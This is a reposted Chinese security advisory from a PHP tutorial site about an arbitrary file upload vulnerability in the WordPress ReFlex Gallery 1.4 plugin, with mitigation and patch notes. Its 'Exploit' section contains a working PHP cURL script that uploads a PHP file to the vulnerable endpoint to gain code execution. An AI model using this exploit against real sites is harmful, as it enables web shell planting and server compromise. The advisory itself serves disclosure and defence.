网站地图    收藏   

主页 > 后端 > 网站安全 >

WordPress ReFlex Gallery插件'php.php'任意文件上

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 受影响系统:WordPress ReFlex Gallery 1.4描述:Sammy FORGIT是合二为一的图库相册插件。WordPress Sammy Forgit内存在安全漏洞,wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php......

 受影响系统:
 
WordPress ReFlex Gallery 1.4
描述:
 
Sammy FORGIT是合二为一的图库相册插件。
 
WordPress Sammy Forgit内存在安全漏洞,wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php允许上传带有任意扩展名的文件到webroot内的文件夹,通过提交恶意的PHP脚本,可导致任意PHP代码执行。
 
<*来源:Sammy Forgit
  
  链接:http://packetstormsecurity.com/files/119218/wpreflexgallery-shell.txt
        http://www.securelist.com/en/advisories/51698
*>
 
测试方法:
 
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
 
Exploit :
 
PostShell.php
 
<?php
 
$uploadfile="lo.php"; 
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>
 
Shell Access :
http://localhost/wordpress/wp-content/uploads/
Filename PostShell.php output
 
lo.php
<?php
phpinfo();
?>
 
# Site : 1337day.com Inj3ct0r Exploit Database
 
 
临时解决方法:
 
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
 
* 禁用WordPress ReFlex Gallery插件
 
厂商补丁:
 
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/extend/plugins/reflex-gallery/
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论